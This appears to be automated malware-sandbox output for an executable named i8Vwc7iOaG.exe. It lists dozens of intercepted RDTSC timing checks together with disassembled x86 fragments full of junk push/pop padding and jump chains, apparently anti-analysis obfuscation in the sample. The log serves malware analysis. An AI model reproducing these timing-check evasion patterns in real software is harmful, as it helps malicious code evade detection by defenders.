Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE0D83 second address: BE0D97 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FC750FDC8E8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE0D97 second address: BE0D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE0D9D second address: BE0DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE0DA1 second address: BE0DAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE0DAA second address: BE0DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE0DB0 second address: BE0DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE0DB6 second address: BE0DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE62CC second address: BE62E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE62E9 second address: BE62ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE62ED second address: BE62F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE62F1 second address: BE62FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE62FC second address: BE6302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE5DD6 second address: BE5E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC750FDC8EEh 0x0000000a pushad 0x0000000b popad 0x0000000c jp 00007FC750FDC8E6h 0x00000012 jmp 00007FC750FDC8ECh 0x00000017 push esi 0x00000018 jg 00007FC750FDC8E6h 0x0000001e pushad 0x0000001f popad 0x00000020 pop esi 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 je 00007FC750FDC8E6h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE5E08 second address: BE5E21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE5E21 second address: BE5E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC750FDC8E6h 0x0000000a jnp 00007FC750FDC8E6h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE5FA2 second address: BE5FA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BE5FA8 second address: BE5FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BFD486 second address: BFD48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BFD48B second address: BFD495 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC750FDC8ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BFD495 second address: BFD4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC750B60C2Ch 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FC750B60C35h 0x00000015 pop ebx 0x00000016 jmp 00007FC750B60C39h 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007FC750B60C26h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BFD932 second address: BFD938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BFDC12 second address: BFDC20 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jg 00007FC750B60C44h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BFDC20 second address: BFDC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750FDC8F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007FC750FDC8F2h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BFDC54 second address: BFDC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750B60C35h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BFF6A0 second address: BFF6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BFF6A4 second address: BFF6B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC750B60C28h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: BFF6B2 second address: BFF6B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: C02009 second address: C02013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC750B60C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: C02013 second address: C02017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: C02017 second address: C02029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FC750B60C26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: C0231D second address: C02321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: C02321 second address: C02372 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC750B60C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC750B60C31h 0x00000011 nop 0x00000012 and dh, FFFFFFC3h 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FC750B60C28h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 xor dx, 41A5h 0x00000036 push 36210B56h 0x0000003b push eax 0x0000003c push edx 0x0000003d push edi 0x0000003e push edx 0x0000003f pop edx 0x00000040 pop edi 0x00000041 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2408B second address: B24091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5060421 second address: 5060427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5060427 second address: 5060479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 jmp 00007FC750FDC8F8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FC750FDC8F0h 0x00000013 push eax 0x00000014 jmp 00007FC750FDC8EBh 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC750FDC8F0h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5060479 second address: 506047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 506047D second address: 5060483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5060483 second address: 50604E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC750B60C30h 0x00000010 mov edx, dword ptr [ebp+0Ch] 0x00000013 jmp 00007FC750B60C30h 0x00000018 mov ecx, dword ptr [ebp+08h] 0x0000001b pushad 0x0000001c push eax 0x0000001d jmp 00007FC750B60C2Dh 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 call 00007FC750B60C37h 0x0000002a pop esi 0x0000002b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50604F9 second address: 50604FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50604FD second address: 5060519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5060519 second address: 5060565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 060B30E4h 0x00000008 jmp 00007FC750FDC8EDh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov eax, edx 0x00000016 pushfd 0x00000017 jmp 00007FC750FDC8EFh 0x0000001c sub cl, FFFFFFAEh 0x0000001f jmp 00007FC750FDC8F9h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5060565 second address: 506056B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 506056B second address: 506056F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50807A7 second address: 50807AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50807AB second address: 50807B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50807B1 second address: 5080814 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC750B60C35h 0x00000008 mov ch, DBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e jmp 00007FC750B60C33h 0x00000013 lea eax, dword ptr [ebp-04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FC750B60C2Bh 0x0000001f or cx, AF4Eh 0x00000024 jmp 00007FC750B60C39h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080814 second address: 5080860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 70ABC129h 0x00000008 mov al, 46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC750FDC8ECh 0x00000015 and ch, FFFFFFF8h 0x00000018 jmp 00007FC750FDC8EBh 0x0000001d popfd 0x0000001e pushad 0x0000001f push eax 0x00000020 pop edx 0x00000021 mov cx, AF41h 0x00000025 popad 0x00000026 popad 0x00000027 mov dword ptr [esp], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC750FDC8F3h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080860 second address: 508087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 call 00007FC750B60C2Bh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 508091D second address: 5080924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, DAh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080924 second address: 508096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c mov cl, 10h 0x0000000e jmp 00007FC750B60C39h 0x00000013 popad 0x00000014 pop esi 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 mov dx, si 0x0000001c popad 0x0000001d mov edx, ecx 0x0000001f popad 0x00000020 leave 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 508096F second address: 5080982 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080982 second address: 50701AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007FC750B60D8Ah 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007FC75527CF51h 0x00000027 mov edi, edi 0x00000029 pushad 0x0000002a push edx 0x0000002b mov ebx, ecx 0x0000002d pop ecx 0x0000002e mov ecx, edx 0x00000030 popad 0x00000031 push esp 0x00000032 pushad 0x00000033 movzx ecx, bx 0x00000036 mov cx, bx 0x00000039 popad 0x0000003a mov dword ptr [esp], ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50701AC second address: 50701C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50701C4 second address: 50701D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50701D4 second address: 50701D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50701D8 second address: 50701DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50701DE second address: 5070238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC750FDC8F8h 0x00000008 pop esi 0x00000009 movsx ebx, ax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f sub esp, 2Ch 0x00000012 pushad 0x00000013 mov edx, esi 0x00000015 push ecx 0x00000016 pop ebx 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FC750FDC8F4h 0x00000020 and ax, 9278h 0x00000025 jmp 00007FC750FDC8EBh 0x0000002a popfd 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070238 second address: 5070264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC750B60C30h 0x0000000a jmp 00007FC750B60C35h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070264 second address: 507026A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507026A second address: 507026E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507026E second address: 50702E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC750FDC8F5h 0x00000010 adc esi, 5CC91F26h 0x00000016 jmp 00007FC750FDC8F1h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FC750FDC8F0h 0x00000022 sbb eax, 0620F0C8h 0x00000028 jmp 00007FC750FDC8EBh 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, edi 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FC750FDC8F5h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50702E2 second address: 50702E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50702E7 second address: 5070308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 09087F40h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC750FDC8F0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070308 second address: 507030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507030C second address: 5070312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070350 second address: 5070354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070354 second address: 507035A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507035A second address: 50703DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007FC750B60C37h 0x00000010 sub edi, edi 0x00000012 jmp 00007FC750B60C2Fh 0x00000017 inc ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC750B60C2Bh 0x00000021 add si, B29Eh 0x00000026 jmp 00007FC750B60C39h 0x0000002b popfd 0x0000002c jmp 00007FC750B60C30h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50703DD second address: 50703EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC750FDC8EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50703EF second address: 5070416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC750B60C39h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070416 second address: 507041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507041C second address: 507045E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC750B60E03h 0x0000000f jmp 00007FC750B60C30h 0x00000014 lea ecx, dword ptr [ebp-14h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC750B60C37h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070491 second address: 5070500 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FC750FDC8F3h 0x0000000d add ecx, 5A063F8Eh 0x00000013 jmp 00007FC750FDC8F9h 0x00000018 popfd 0x00000019 popad 0x0000001a nop 0x0000001b jmp 00007FC750FDC8EEh 0x00000020 push eax 0x00000021 pushad 0x00000022 movsx edi, ax 0x00000025 push eax 0x00000026 push edi 0x00000027 pop esi 0x00000028 pop edi 0x00000029 popad 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC750FDC8F7h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070500 second address: 5070506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070506 second address: 507050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070524 second address: 507054C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC750B60C35h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507054C second address: 507055C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC750FDC8ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507055C second address: 5070560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070560 second address: 50705A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FC7C1A0A80Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bh, cl 0x00000013 pushfd 0x00000014 jmp 00007FC750FDC8F5h 0x00000019 sbb ax, 27F6h 0x0000001e jmp 00007FC750FDC8F1h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50705A1 second address: 50705A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
